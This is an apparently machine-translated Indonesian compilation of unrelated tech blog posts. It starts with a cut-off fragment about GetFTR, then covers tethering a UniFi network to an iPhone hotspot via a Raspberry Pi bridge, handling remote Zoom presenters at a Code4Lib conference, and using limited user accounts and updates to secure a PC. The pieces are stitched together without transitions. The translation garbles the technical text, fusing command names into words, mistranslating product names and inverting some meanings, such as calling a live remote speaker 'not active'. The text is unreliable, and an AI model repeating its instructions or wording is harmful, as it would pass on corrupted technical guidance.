  • Akankah GetFTR menarik minat Google, Google Scholar, dan Microsoft Research (di mana memang banyak penemuan artikel sudah terjadi)?
  • Apakah pengembang lapisan penemuan dan penyelesai tautan akan memprioritaskan implementasi GetFTR dalam layanan mereka?
  • Akankah perpustakaan menemukan nilai yang cukup di GetFTR untuk mengaktifkannya di lapisan penemuan dan penyelesai tautan?
  • Apakah perpustakaan akan menentang GetFTR dalam sistem manajemen pembelajaran, sistem profil fakultas, dan sistem

Menambatkan Jaringan Ubiquity ke Hotspot Seluler

Menambatkan Jaringan Ubiquity ke Hotspot Seluler – Kontraktor di halaman belakang tetangga dengan parit Ditch Witch mengubur kabel. Saya sedang bekerja di luar di meja teras dan baru saja akan pergi ke pertemuan Zoom. Lalu internet putus. Tiba-tiba, dan dengan perasaan memilukan di dalam perutku, aku ingat di mana garis pakan terkubur di antara rumah dan alas perusahaan kabel di kanan jalan antara properti. Yup, dia baru saja memotongnya.

Agar adil, layanan pencari lokasi tidak menandai lokasi kabel saya, dan ia bekerja untuk penyedia kabel yang berbeda dari yang kami gunakan. (Ada tiga penyedia di lingkungan kami.) Namun, itu berarti bahwa internet broadband kami akan keluar sampai penyedia saya dapat datang dan menjalankan saluran lain. Butuh waktu satu jam untuk memikirkan situasi untuk mencari solusi, lalu beberapa jam lagi untuk meletakkannya: iPhone yang ditambatkan ke Raspberry Pi yang bertindak sebagai jembatan jaringan ke jaringan rumah saya UniFi Security Gateway 3P.

Beberapa tahun yang lalu saya bosan berurusan dengan router internet konsumen jerawatan dan upgrade rumah ke peralatan UniFi dari Ubiquity. Rob Pickering, seorang kolega kampus, telah menulis tentang pengalamannya dengan perlengkapan dan saya terkesan. Itu bukan upgrade murah, tapi itu layak dilakukan. (Terutama sekarang dengan empat orang di rumah tangga yang bekerja dan sekolah dari rumah selama wabah COVID-19.) UniFi Security Gateway memiliki tiga port jaringan, dan saya menggunakan dua: satu untuk uplink ke penyedia internet kabel (WAN) dan satu untuk jaringan area lokal (LAN) di rumah. Port ketiga dapat dikonfigurasi sebagai uplink WAN lain atau sebagai port LAN lainnya. Dan Anda bisa memberi tahu Gateway Keamanan untuk menggunakan WAN kedua sebagai failover untuk WAN pertama (atau sebagai load balancing WAN pertama). Jadi itu cukup mudah, tetapi apakah saya mendapatkan Hotspot Pribadi di iPhone ke port WAN kedua? Di situlah Raspberry Pi masuk.

The Raspberry Pi adalah komputer kecil dengan USB, ethernet, HDMI, dan port audio. Versi yang saya gunakan adalah Raspberry Pi 2 — model yang lebih tua, tetapi cukup kuat untuk menjadi jembatan jaringan antara iPhone dan jaringan rumah. Bagian tersulit adalah bootstrap paket sistem operasi ke Pi dengan hanya iPhone Personal Hotspot sebagai jaringan. Itulah yang saya dokumentasikan di sini untuk referensi di masa mendatang.

Bootstrap Raspberry Pi

Raspberry Pi menjalankan sistem operasinya sendiri yang disebut Raspbian (turunan Debian / Linux) serta sistem operasi yang lebih umum. Saya memilih untuk menggunakan Server Ubuntu untuk Raspberry Pi daripada Raspbian karena saya lebih akrab dengan Ubuntu. Saya menambatkan MacBook Pro saya ke iPhone untuk mengunduh gambar Ubuntu 18.04.4 LTS dan mengikuti instruksi untuk menyalin gambar disk tersebut ke kartu microSD Pi . Itu memungkinkan saya untuk boot Pi dengan Ubuntu dan satu set dasar paket sistem operasi.

Tantangan: Mendapatkan paket jaringan yang diperlukan ke Pi

Akan sangat menyenangkan untuk menghubungkan iPhone ke Pi dengan kabel USB-Lightning dan menemukan jaringan yang tertambat. Tapi itu tidak berhasil. Ubuntu membutuhkan setidaknya usbmuxdpaket untuk melihat iPhone yang ditambatkan sebagai perangkat jaringan. Paket itu bukan bagian dari unduhan gambar disk. Dan tentu saja saya tidak bisa menyambungkan Pi saya ke jaringan rumah untuk mengunduhnya (lihat paragraf pertama dari posting ini).

Satu-satunya pilihan saya adalah menambatkan Pi ke iPhone melalui WiFi dengan adaptor jaringan USB. Dan itu sedikit voodoo Ubuntu. Untungnya, saya menemukan instruksi untuk mengkonfigurasi Ubuntu agar menggunakan jaringan nirkabel yang dilindungi WPA (seperti yang disediakan oleh iPhone Personal Hotspot). Secara singkat:

sudo -i
cd /root
wpa_passphrase my_ssid my_ssid_passphrase > wpa.conf
screen -q
wpa_supplicant -Dwext -iwlan0 -c/root/wpa.conf
<control-a> c
dhclient -r
dhclient wlan0

Penjelasan garis:

  1. Gunakan sudountuk mendapatkan shell root
  2. Ubah direktori ke rumah root
  3. Gunakan wpa_passphraseperintah untuk membuat wpa.conffile. Ganti my_ssiddengan nama jaringan nirkabel yang disediakan oleh iPhone (nama iPhone Anda) dan my_ssid_passphrasedengan frasa sandi jaringan nirkabel (lihat bidang “Kata Sandi Wi-Fi” di Pengaturan -> Personal Hotspot ).
  4. Mulai screenprogram (diam-diam) sehingga kita dapat memiliki beberapa terminal semu.
  5. Jalankan wpa_supplicantperintah untuk menghubungkan ke hotspot wifi iPhone. Kami menjalankan latar depan ini sehingga kami dapat melihat status / pesan kesalahan; program ini harus terus berjalan agar tetap terhubung ke jaringan wifi.
  6. Gunakan screenhotkey untuk membuat terminal pseudo baru. Ini adalah kontrol-a diikuti oleh huruf c.
  7. Gunakan dhclientuntuk menghapus parameter jaringan DHCP
  8. Gunakan dhclientuntuk mendapatkan alamat IP dari iPhone melalui jaringan nirkabel.

Sekarang saya berada di titik di mana saya bisa menginstal paket Ubuntu. (Saya berlari ping www.google.comuntuk memverifikasi konektivitas jaringan.) Untuk menginstal paket usbmuxd dan jembatan jaringan (dan prasyaratnya):

apt-get install usbmuxd bridge-utils

Jika pengalaman Anda seperti pengalaman saya, Anda akan mendapatkan kesalahan kembali:

couldn't get lock /var/lib/dpkg/lock-frontend

Mesin Ubuntu Pi sekarang ada di jaringan, dan proses otomatis untuk menginstal pembaruan keamanan sedang berjalan. Itu mengunci registri paket Ubuntu sampai selesai. Butuh waktu sekitar 30 menit bagi saya. (Saya membayangkan ini bervariasi berdasarkan kapasitas jaringan Anda yang tertambat dan jumlah pembaruan keamanan yang perlu diunduh.) Saya memantau progres proses otomatis dengan htopperintah dan mencoba apt-getperintah ketika selesai. Jika Anda mengikuti, sekarang saat yang tepat untuk melompat ke depan untuk Mengkonfigurasi Gateway Keamanan UniFi jika Anda belum mengaturnya.

Mengubah Raspberry Pi menjadi Bridge Jaringan

Dengan semua paket perangkat lunak yang diinstal, saya shutdown -r now me -restart Pi untuk menyelesaikan pembaruan: Ketika sedang reboot, saya mengeluarkan adaptor nirkabel USB dari Pi dan terhubung ke kabel USB iPhone. Pi sekarang melihat iPhone sebagai eth1, tetapi jaringan tidak mulai sampai saya pergi ke iPhone untuk mengatakan bahwa saya “Percayai” komputer yang terhubung ke dalamnya. Ketika saya melakukan itu, saya menjalankan perintah-perintah ini di Pi Ubuntu:

dhclient eth1
brctl addbr iphonetether
brctl addif iphonetether eth0 eth1
brctl stp iphonetether on
ifconfig iphonetether up

Penjelasan garis:

  1. Dapatkan alamat IP dari iPhone melalui antarmuka USB
  2. Tambahkan jembatan jaringan ( iphonetetheradalah string arbitrer; beberapa instruksi cukup gunakan br0untuk jembatan zero-ith)
  3. Tambahkan dua antarmuka ethernet ke jembatan jaringan
  4. Nyalakan Spanning Tree Protocol (Saya tidak berpikir ini benar-benar diperlukan, tetapi tidak ada salahnya)
  5. Memunculkan antarmuka jembatan

Jembatan itu sekarang hidup! Terima kasih kepada Amitkumar Pal untuk petunjuk tentang menggunakan Pi sebagai jembatan jaringan. Rincian lebih lanjut tentang perangkat lunak jaringan jembatan ada di Debian Wiki.

Mengkonfigurasi Gateway Keamanan UniFi

Saya memiliki Kunci Cloud UniFi, sehingga saya dapat mengubah konfigurasi jaringan UniFi dengan browser. (Anda harus mengetahui alamat IP Cloud Key; semoga Anda memilikinya di suatu tempat.) Saya terhubung ke Cloud Key di https://192.168.1.58:8443/ dan mengklik peringatan sertifikat yang ditandatangani sendiri.

Pertama saya membuat Wide Area Network kedua (WAN — uplink Anda ke internet) untuk iPhone Personal Hotspot: Pengaturan -> Internet -> WAN Networks . Pilih “Buat Jaringan Baru”:

  • Nama Jaringan : Backup WAN
  • Jenis Koneksi IPV4 : Gunakan DHCP
  • Jenis Koneksi IPv6 : Gunakan DHCPv6
  • Server DNS : 1.1.1.1dan 1.0.0.1(server DNS CloudFlare)
  • Penyeimbangan beban :Failover only

Pilihan terakhir adalah kunci … Saya ingin gateway hanya menggunakan antarmuka WAN ini sebagai cadangan untuk antarmuka broadband utama. Jika broadband kembali, saya ingin berhenti menggunakan iPhone tertambat!

Kedua, tetapkan Backup WAN ke port LAN2 / WAN2 di Security Gateway ( Perangkat -> Gateway -> Ports -> Configure interfaces ):

  • Port WAN2 / LAN2 Network : WAN2
  • Kecepatan / Dupleks : Autonegosiasi

Terapkan perubahan untuk menyediakan Security Gateway. Setelah sekitar 45 detik, Security Gateway gagal dari “WAN iface eth0” (koneksi broadband saya) ke “WAN iface eth2” (iPhone saya yang tertambat melalui jembatan Pi). Ini muncul sebagai peringatan di antarmuka UniFi.

Performa dan Hasil

Jadi saya cukup senang dengan pengaturan ini. Keluarga telah menjalankan panggilan Zoom dan penelusuran web secara simultan di jaringan rumah, dan kinerjanya sebagian besar normal. Halaman web memang butuh waktu lebih lama untuk dimuat, tetapi Zoom apa pun yang digunakan untuk secara dinamis menyesuaikan penggunaan bandwidthnya cukup baik. Ini mengunyah kuota data seluler dengan cukup cepat, jadi itu bukan sesuatu yang ingin saya lakukan setiap hari. Mengetahui bahwa ini mungkin, sungguh melegakan. Sebagai bonus, iPhone tetap dikenakan biaya melalui daya 1 amp yang datang melalui Pi.

Mengelola Presenter Konferensi Jarak Jauh dengan Zoom

Mengelola Presenter Konferensi Jarak Jauh dengan Zoom – Membawa presenter jarak jauh ke dalam konferensi tatap muka adalah tantangan dan penuh bahaya. Dalam posting ini, saya menggambarkan skema menggunakan Zoom yang membuat hadirin lupa bahwa presenternya jauh!

The konferensi Code4Lib adalah minggu ini, dan dengan COVID-19 pandemi melanggar melalui banyak individu dan lembaga membuat keputusan untuk tidak perjalanan ke Pittsburgh untuk pertemuan. Kami memiliki sembilan presentasi yang belum pernah terjadi sebelumnya yang dibawa ke konferensi melalui Zoom. Saya memimpin komite streaming langsung untuk konferensi (seperti yang telah saya lakukan selama beberapa tahun — melewatkan tahun lalu), jadi masuk akal jika saya mengatur skema untuk presenter jarak jauh. Dengan bantuan kontraktor A / V di tempat, kami dapat melakukan ini dengan persyaratan minimal untuk presenter jarak jauh.

Daftar Persyaratan

  • 2 Zoom akun Pro
  • 1 PC / Mac dengan output video, seolah-olah Anda sedang menghubungkan monitor eksternal (komputer “Menerima Zoom”)
  • 1 PC / Mac (komputer “Koordinator Zoom”)
  • 1 antarmuka audio USB
  • Koneksi jaringan bawaan untuk komputer Receiving Zoom (disarankan)

The Pro -tingkat Zoom rekening yang diperlukan karena kami diperlukan untuk menjalankan panggilan grup selama lebih dari 40 menit (untuk memasukkan waktu setup). Dan dua diperlukan: satu untuk mesin Zoom Koordinator dan satu untuk mesin Zoom Penerimaan khusus. Mungkin saja untuk menggabungkan dua akun Zoom Pro dan dua mesin PC / Mac menjadi satu, tetapi kami memiliki presenter back-to-back di Code4Lib, dan saya ingin dapat membantu satu presenter jarak jauh bersiap-siap sementara yang lain mempresentasikan.

Selain peralatan ini, kontraktor A / V sangat diperlukan dalam membuat sambungan berfungsi. Kami mengumpankan video dan audio presenter jarak jauh dari komputer Receiving Zoom ke sakelar A / V kontraktor melalui HDMI, dan kontraktor meletakkan video pada proyektor dan audio ballroom melalui speaker ballroom. Kontraktor memberi kami umpan audio selektif dari audio program minus audio presenter jarak jauh (sehingga mereka tidak akan mendengar sendiri kembali melalui rapat Zoom). Ini menjadi sedikit lebih jelas dalam diagram di bawah ini.

Koneksi dan Pengaturan Fisik

Diagram ini menunjukkan koneksi fisik antar mesin.

The Audio Mixer dan Video Beralih disediakan dan dikelola oleh kontraktor A / V. The Menerima Zoommesin adalah yang terhubung ke Video Switch kontraktor A / V melalui kabel HDMI yang keluar dari koneksi monitor eksternal komputer. Di panel kontrol komputer Zoom Menerima, kami mengatur monitor eksternal untuk mencerminkan apa yang ada di monitor utama. Audio dan video dari komputer (yaitu, panggilan Zoom) keluar kabel HDMI ke Video Switch kontraktor A / V. Kontraktor A / V mengambil audio dari komputer Receiving Zoom melalui Video Switch dan menambahkannya ke Audio Mixer sebagai saluran input. Dari sana, audio dikirim ke speaker ballroom dengan cara yang sama audio dari mikrofon podium diamplifikasi ke penonton. Kami meminta kontraktor A / V untuk membuat campuran audio yang mencakup semua sumber audio kecualikomputer Receiving Zoom (mis., mikrofon di kamar) dan menyambungkannya ke antarmuka Audio USB. Dengan begitu, presenter jarak jauh bisa mendengar suara-suara dari ruang dansa — tawa sekitar, pertanyaan dari penonton, dll — dalam panggilan Zoom mereka. (Perhatikan bahwa penting untuk menghapus suara yang berbicara sendiri dari presenter jarak jauh dari campuran audio ini; ada penundaan yang signifikan dan mengganggu antara waktu presenter berbicara dan audio dikembalikan kepada mereka melalui panggilan Zoom.)

Kami menggunakan koneksi jaringan bawaan ke internet, dan saya akan merekomendasikan itu — terutama dengan konferensi teknologi yang mungkin meluap tempat wi-fi. (Anda tidak ingin Zoom presenter jarak jauh Anda harus bersaing dengan apa yang peserta lakukan.) Perlu diketahui bahwa koneksi jaringan bawaan akan lebih mahal dari tempat tersebut, dan mungkin perlu waktu untuk berfungsi karena ini sepertinya tidak menjadi sesuatu yang sering dilakukan hotel.

Dalam rapat Zoom, kami membisukan mikrofon dan memilih antarmuka Audio USB sebagai input mikrofon. Ketika rapat Zoom terhubung, kami membuat jendela rapat layar penuh sehingga wajah dan / atau presentasi presenter berada pada ukuran maksimum pada proyektor ballroom.

Menyiapkan Rapat Zoom

Dua akun Zoom berasal dari Open Library Foundation . (Terima kasih!) Seperti yang disebutkan di bagian persyaratan di atas, ini adalah akun Pro- level. Dua akun itu adalah [email protected]dan [email protected]. The olf_host2akun digunakan untuk komputer Zoom Menerima, dan olf_host3akun yang digunakan untuk komputer Zoom Koordinator. Halaman edit rapat Zoom tampak seperti ini:

Ini untuk pertemuan “Code4Lib 2020 Remote Presenter A” dengan host utama sebagai [email protected]. Perhatikan pengaturan ini:

  • Pertemuan berulang yang berlangsung dari jam 8 pagi sampai 6 sore setiap hari konferensi.
  • Aktifkan bergabung sebelum tuan rumah diperiksa seandainya presenter jarak jauh menghadiri rapat sebelum saya melakukannya.
  • Rekam rapat secara otomatis di cloud untuk digunakan sebagai cadangan jika terjadi kesalahan.
  • Host Alternatif adalah[email protected]

Pertemuan “Code4Lib 2020 Remote Presenter B” persis sama kecuali host utama olf_host3, dan olf_host2ditambahkan sebagai host alternatif. Rapat diatur dengan satu sama lain sebagai tuan rumah alternatif sehingga komputer Zoom Koordinator dapat memulai rapat, secara mulus menyerahkannya ke komputer Receiving Zoom, kemudian lepaskan.

Mempersiapkan Remote Presenter

Penyaji jarak jauh diberi informasi ini:

Code4Lib akan menggunakan Zoom untuk presenter jarak jauh. Selain perangkat lunak, memiliki pengaturan audio yang tepat sangat penting untuk presentasi yang sukses.

  • Mikrofon : Pilihan terbaik adalah headset atau earbud sehingga mikrofon dekat dengan mulut Anda. Mikrofon laptop built-in tidak apa-apa, tetapi menggunakannya akan mempersulit audiens untuk mendengarkan Anda.
  • Pembicara : Diperlukan headset atau earbud. Jangan gunakan speaker internal komputer Anda. Perangkat lunak pembatalan gema dirancang untuk kamar kecil dan tidak dapat menangani penundaan yang disebabkan oleh ruang dansa besar.

Anda dapat menguji pengaturan Anda dengan uji Zoom panggilan . Pastikan mikrofon dan speaker Anda diatur dengan benar di Zoom. Juga, coba bagikan layar Anda pada panggilan uji sehingga Anda mengerti bagaimana memulai dan menghentikan berbagi layar. Audiens akan melihat semua yang ada di layar Anda, jadi hentikan / nonaktifkan / matikan pemberitahuan yang datang dari program obrolan, klien email, dan alat serupa.

Rencanakan untuk terhubung ke rapat Zoom 30 menit sebelum pembicaraan Anda menyelesaikan masalah koneksi atau pengaturan apa pun.

Pada tanda 30 menit sebelum presentasi jarak jauh, saya pergi ke lobi ballroom dan terhubung ke pertemuan Zoom yang ditunjuk untuk presenter jarak jauh menggunakan komputer Zoom Koordinator. Saya menggunakan daftar periksa ini dengan masing-masing presenter:

  • Periksa level mikrofon dan kualitas suara presenter (pastikan mikrofon headset / earbud digunakan!)
  • Periksa speaker presenter dan pastikan tidak ada gema
  • Tes berbagi layar ( mulai dan berhenti ) dengan presenter
  • Ingatkan presenter untuk mematikan notifikasi dari program obrolan, klien email, dll.
  • Ingatkan presenter bahwa mereka perlu melacak waktu mereka sendiri; tidak ada cara bagi kita untuk memberi mereka petunjuk tentang waktu selain memotong mereka ketika waktu mereka habis

Item penting adalah memastikan audio berfungsi (bahwa komputer mereka diatur untuk menggunakan headset / mikrofon earbud dan output audio). Hasilnya adalah kualitas suara yang sangat baik untuk para penonton.

Ketika presenter jarak jauh diatur pada pertemuan Zoom, saya kembali ke tabel A / V dan meminta bantuan streaming langsung untuk menghubungkan Zoom Penerima ke pertemuan Zoom presenter jarak jauh. Pada titik ini, presenter jarak jauh dapat mendengar audio di ruang ball speaker sebelum mereka datang melalui komputer Receiving Zoom. Sekarang saya akan mengunci rapat Zoom untuk mencegah orang lain bergabung dan mengganggu presenter (dari Peserta panel Zoom, pilih Lebih maka Rapat Lock ). Saya nongkrong di pertemuan presenter jarak jauh pada komputer Zoom Koordinator jika mereka punya pertanyaan menit terakhir. Ketika speaker di ballroom selesai, saya berharap presenter jarak jauh dengan baik dan memutus komputer Zoom Koordinator dari rapat. (Saya selalu memilihTinggalkan Rapat alih-alih Akhiri Rapat untuk Semua sehingga rapat Zoom berlanjut dengan presenter jarak jauh dan komputer Menerima Zoom.)

Ketika presenter jarak jauh diperkenalkan — dan pembicara akan tahu karena mereka dapat mendengarnya dalam rapat Zoom mereka — kontraktor A / V mengalihkan sumber video untuk proyektor ballroom ke komputer Receiving Zoom dan membunyikan saluran komputer Receiving Zoom pada Mixer Audio. Pada titik ini, speaker jarak jauh tidak aktif!

Pikiran Terakhir

Ini bekerja dengan sangat baik. Sangat bagus. Begitu baik sehingga saya memiliki beberapa orang berkomentar bahwa mereka terkejut ketika mereka menyadari bahwa tidak ada yang berdiri di podium selama presentasi.

Saya senang telah mengatur dua pertemuan Zoom. Kami memiliki dua kasus di mana presenter jarak jauh saling berhadapan. Saya dapat mengatur presenter jarak jauh pertama dan siap pada satu rapat Zoom sambil menyiapkan presenter jarak jauh kedua pada rapat Zoom lainnya. Bagian yang paling menegangkan adalah pada saat kami memutus pertemuan Zoom presenter pertama dan dengan cepat terhubung ke rapat Zoom presenter kedua. Ini sedikit canggung untuk presenter jarak jauh kedua karena mereka tidak mendengar perkenalan penuh mereka saat itu terjadi dan harus langsung masuk ke presentasi mereka. Ini dapat diselesaikan dengan menyiapkan komputer Receiving Zoom kedua, tetapi kompleksitas tambahan ini tampaknya terlalu banyak untuk keuntungan yang didapat.

Saya pasti akan merekomendasikan untuk membuat pengaturan ini sebagai bagian dari persiapan A / V khas untuk konferensi Code4Lib di masa depan. Kami tidak tahu kapan keadaan individu (apalagi pandemi di seluruh dunia) dapat menyebabkan permintaan menit terakhir untuk kemampuan presentasi jarak jauh, dan overhead pengaturan sangat minim.

Lindungi Komputer Anda dengan Trik Sederhana Ini

Lindungi Komputer Anda dengan Trik Sederhana Ini – Cara terbaik untuk melindungi mesin Anda adalah yang paling sederhana: Membuat dan menggunakan akun pengguna terbatas untuk tugas harian Anda.

Ada satu trik sederhana yang akan membuat PC atau Mac Anda jauh lebih aman dari malware dan peretas jahat. Itu tidak melibatkan membeli perangkat lunak antivirus atau menjatuhkan ke baris perintah.

Rahasia berharga ini? Buat akun pengguna terbatas untuk Anda sendiri. Gunakan akun terbatas itu untuk semua aktivitas komputer harian Anda, termasuk tugas internet dan kantor.

Pastikan semua orang yang menggunakan mesin itu juga memiliki akun terbatas. Simpan akun administrator Anda untuk tugas-tugas administratif, termasuk menginstal dan memperbarui aplikasi dan perangkat lunak lain. Menggunakan sistem ini akan mencegah atau membatasi sebagian besar infeksi malware , baik pada PC maupun Mac.

Satu-satunya hal yang Anda akan menyerah adalah kemampuan untuk segera menginstal, memodifikasi atau menghapus perangkat lunak, tanpa pertanyaan. Tetapi pada sistem operasi hari ini, yang perlu Anda lakukan adalah mengetikkan nama pengguna dan kata sandi pengguna administratif . Keamanan yang Anda dapatkan akan sebanding dengan ketidaknyamanan kecil.

Bagaimana akun terbatas melindungi Anda

Sistem pemisahan akun ini berfungsi karena, tidak seperti akun administrator, akun terbatas tidak dapat menginstal, memperbarui atau menghapus aplikasi dan perangkat lunak yang dapat dieksekusi lainnya.

Akibatnya, malware – virus , worm, Trojan , rootkit, ransomware , dan sebagainya – yang mencoba menginfeksi mesin melalui akun terbatas sering kali tidak dapat menginstal sendiri dan tidak akan mendapatkan tumpuan. Jika berhasil menginfeksi akun terbatas, biasanya hanya akan memengaruhi file, folder, dan aplikasi khusus pengguna tersebut. Malware biasanya tidak akan bisa masuk ke sistem operasi atau ke akun pengguna lain.

LEBIH: Perangkat Lunak dan Aplikasi Antivirus Terbaik

Laporan Kerentanan Microsoft dari perusahaan keamanan Inggris Avecto , dirilis pada Februari 2017, jelas: “93 persen kerentanan Windows 10 dapat dikurangi dengan menghapus hak admin … termasuk 100 persen kerentanan yang mempengaruhi browser terbaru, Edge.”

Kami tidak memiliki angka serupa untuk dikutip untuk Mac, tetapi pembuat antivirus Mac Intego merekomendasikan untuk menggunakan akun terbatas atau “standar” pada Mac untuk alasan yang sama.

Cara membuat akun terbatas

Microsoft dan Apple digunakan untuk mengatur setiap pengguna baru dengan akun administrator secara default. Tetapi pada kenyataannya, Anda hanya perlu satu akun admin per mesin – dan setiap pengguna harus memiliki akun terbatas untuk penggunaan sehari-hari.

Anda harus menggunakan akun administrator untuk melakukan ini, tetapi langkah-langkah di setiap versi Windows saat ini serupa.

Di Windows 7 , buka Mulai -> Panel Kontrol -> Tambah atau Hapus Akun Pengguna, atau Akun Pengguna -> Buat Akun Baru. Ketikkan nama pengguna yang diinginkan, pilih tombol Pengguna Standar dan klik Buat Akun. Kemudian klik Buat Kata Sandi dan masukkan kata sandi yang diinginkan.

Di Windows 8 atau 8.1 , ketuk tombol Windows dan saya pada saat yang sama untuk membuka menu Pengaturan. Pilih Control Panel, lalu Tambah atau Hapus Akun Pengguna atau Akun Pengguna tergantung pada opsi tampilan Panel Kontrol Anda. Pilih Buat Akun Baru. Ketikkan nama pengguna yang diinginkan, pilih tombol Pengguna Standar dan klik Buat Akun. Kemudian klik Buat Kata Sandi dan masukkan kata sandi yang diinginkan.

Di Windows 10 , masuk ke Mulai -> Pengaturan – Akun -> Keluarga & Pengguna Lainnya. Klik “Tambahkan orang lain ke PC ini.” Kemudian pilih “Saya tidak memiliki informasi masuk orang ini” dan klik Berikutnya. (Abaikan prompt untuk memasukkan alamat email atau nomor telepon pengguna.)

Pada layar berikut, pilih “Tambahkan pengguna tanpa akun MIcrosoft” dan klik Berikutnya. (Windows 10 Home dan edisi Professional mungkin tidak menampilkan dua langkah sebelumnya.) Pada layar berikutnya, ketikkan nama pengguna dan kata sandi yang diinginkan dan klik Next. (Kami punya panduan bergambar di sini .)

Mengapa solusi ini tidak dikenal

Jadi mengapa tidak lebih banyak orang melakukan ini? Saya pikir sebagian besar orang tidak tahu tentang akun terbatas, atau, jika mereka tahu, mereka hanya menganggapnya sebagai cara untuk mengontrol aktivitas seorang anak atau pengguna tamu.

Alasan lain adalah bahwa, melalui Windows XP, menggunakan akun terbatas sangat buruk. Sebagian besar aplikasi berasumsi bahwa pengguna akan memiliki hak admin penuh, dan banyak yang tidak berfungsi dengan baik di bawah akun terbatas. Jika pengguna terbatas menemukan proses yang memerlukan otorisasi oleh administrator, ia harus beralih ke akun administrator untuk bergerak maju.

Itu berubah dengan Windows Vista dan pengenalan Kontrol Akun Pengguna Microsoft, yang memperlancar proses. Pengembang perangkat lunak diwajibkan untuk memberikan fungsionalitas maksimum ke akun terbatas, dan jika otorisasi administrator diperlukan, kotak dialog muncul meminta pengguna terbatas untuk nama pengguna dan kata sandi akun administrator.

Saya telah menggunakan sistem ini pada semua PC Windows saya selama beberapa tahun, dan saya tidak pernah menemukan bahwa itu adalah suatu cacat. Ketika perangkat lunak perlu diperbarui, saya mendapatkan kotak pop-up dan memasukkan kredensial admin. Pada Windows 7 dan Windows 10, Pembaruan Windows berjalan tanpa hambatan. Saya jarang perlu masuk ke akun administrator terpisah untuk apa pun.

Apa yang menggunakan akun terbatas tidak dapat dilakukan

Tindakan pencegahan ini tidak akan mencegah atau mengurangi semua infeksi malware. Beberapa malware dapat “meningkatkan” hak istimewa sistemnya dan memberikan kekuatan sendiri yang tidak dimiliki oleh pengguna terbatas. Namun, malware biasa, run-of-the-mill, yang paling sering dihadapi kebanyakan orang, tidak melakukan hal itu.

Ini juga tidak akan menghentikan serangan rekayasa sosial yang dimaksudkan untuk menipu Anda agar menyerahkan informasi sensitif. Jika email phishing meminta Anda untuk masuk ke halaman web Facebook atau Gmail palsu, akun pengguna terbatas tidak akan membantu. Jika perangkat lunak jahat meminta nama pengguna dan kata sandi administratif Anda sehingga dapat menginstal sendiri, memberikan kredensial tersebut akan menghapus manfaat memiliki akun terbatas di tempat pertama.

Yang benar adalah bahwa hanya Anda yang bisa menghentikan serangan rekayasa sosial. Tetapi akun pengguna terbatas dapat menghentikan hampir semua hal lain.

Bagaimana saya bisa membuat PC saya sepenuhnya aman?

Bagaimana saya bisa membuat PC saya sepenuhnya aman? – Juzer ingin membuat PC-nya sepenuhnya aman dari segala jenis virus dan peretasan. Itu tidak mungkin, tetapi Jack Schofield menjelaskan cara membuat Windows jauh lebih aman

Komputer PC

Dalam komputasi, Anda membutuhkan tingkat keamanan yang lebih tinggi jika Anda adalah target yang jelas. Foto: Alamy
Bagaimana saya bisa membuat PC saya sepenuhnya aman dari segala jenis virus dan peretasan? Juzer

Anda tidak bisa, karena fenomena industri komputer lama yang dikenal sebagai PEBCAK , atau “Masalah ada di antara kursi dan keyboard”. Banyak peretasan bergantung pada “rekayasa sosial,” yang berarti memanipulasi orang untuk menyerahkan kata sandi atau detail lainnya. Ini bisa semudah menelepon dan berpura-pura berasal dari kantor pusat atau, tampaknya, bertukar kata sandi untuk cokelat . Linux dan Mac OS X lebih aman daripada Windows, tetapi PEBCAK merupakan masalah pada setiap sistem operasi.

Anda juga bisa bertanya, “Bagaimana saya bisa membuat rumah saya sepenuhnya aman?” Beberapa tindakan pencegahan sederhana akan melindungi Anda dari pencurian biasa di lingkungan yang bagus, tetapi bahkan kawat berduri tidak akan menghentikan geng yang dilengkapi dengan bahan peledak untuk meledakkan pintu Anda. Jadi, masalah sebenarnya adalah memutuskan berapa banyak keamanan yang Anda butuhkan. Ini akan tergantung pada siapa Anda dan di mana Anda tinggal.

WHO? Dalam komputasi, Anda memerlukan tingkat keamanan yang lebih tinggi jika Anda adalah target yang jelas atau Anda memiliki akses ke informasi yang sangat berharga. Sasaran yang jelas termasuk selebritas, aktivis, dan jurnalis investigasi. Anda juga dapat memiliki informasi berharga jika Anda bekerja di bidang keuangan, atau di lembaga penelitian penting, atau untuk beberapa lembaga pemerintah, dll.

Dimana? Dalam komputasi, Anda menciptakan lingkungan Anda sendiri. Jika Anda mengunjungi situs yang berspesialisasi dalam peretasan, perengkahan, atau perangkat lunak bajak laut, maka Anda berisiko lebih besar daripada jika Anda hanya mengunjungi situs utama untuk berbelanja dan jejaring sosial. Situs yang menawarkan musik gratis, perangkat lunak, atau pornografi lebih berbahaya daripada situs yang menawarkan yang setara dengan yang dibayarkan. Ingat, jika gratis, seseorang mungkin menghasilkan uang entah bagaimana, bahkan hanya dengan menginstal adware.

Pertahanan standar

Dalam melindungi rumah Anda, aturan pertama adalah: jangan biarkan pintu tidak terkunci dan jendela terbuka. Dalam melindungi PC Anda, itu: jangan biarkan lubang keamanan terbuka. Tetap perbarui sistem operasi dan semua perangkat lunak Anda. Sebagian besar peretasan Windows didasarkan pada lubang eksploitasi yang Microsoft tutup beberapa bulan atau bahkan bertahun-tahun lalu. Ya, kadang-kadang ada eksploitasi “zero day” yang tidak ada patch, tetapi ini bernilai banyak uang dan terutama digunakan pada target bernilai tinggi.

Agar Windows selalu terbarui, aktifkan pembaruan otomatis: Microsoft akan menginstal patch atau segera setelah Selasa kedua setiap bulan. Namun, versi terbaru Windows, jika ditambal, tidak lagi menjadi target utama . Sebagai prioritas, Anda juga harus memastikan browser Anda (termasuk IE), semua program Adobe dan Apple untuk Windows, dan Java Oracle terbaru. Hapus instalasi Java jika Anda tidak benar-benar membutuhkannya. Ya, hapus semua yang tidak Anda butuhkan: itu akan mengurangi permukaan serangan Anda.

Beberapa program dapat membantu. Saya menggunakan Inspektur Perangkat Lunak Pribadi Secunia , yang memeriksa program yang belum ditonton dan membantu memperbaruinya. Saya juga menggunakan SlimCleaner SlimWare , yang memeriksa dan memberi peringkat perangkat lunak Anda (semuanya harus Baik), dan mencantumkan program yang perlu diperbarui. Itu juga paket dalam banyak alat berguna lainnya termasuk pembersih, penganalisa disk / defragger / penghapus / penghancur dan duplikat pencari file, dan log pembajak.

Anda juga harus menjalankan perangkat lunak anti-virus. Banyak orang menggunakan Microsoft Security Essentials atau Windows Defender bawaan. Mereka yang membutuhkan sesuatu yang lebih berat dapat menginstal program gratis seperti Avast 2015 atau AVG Free. Jika Anda membutuhkan keamanan yang lebih lengkap, instal suite berbayar seperti Kaspersky atau Bitdefender Total Security 2015. Lihat jawaban saya sebelumnya, Bagaimana saya bisa melindungi PC Windows saya terhadap malware? , dan periksa beberapa tes terbaru sebelum memutuskan.

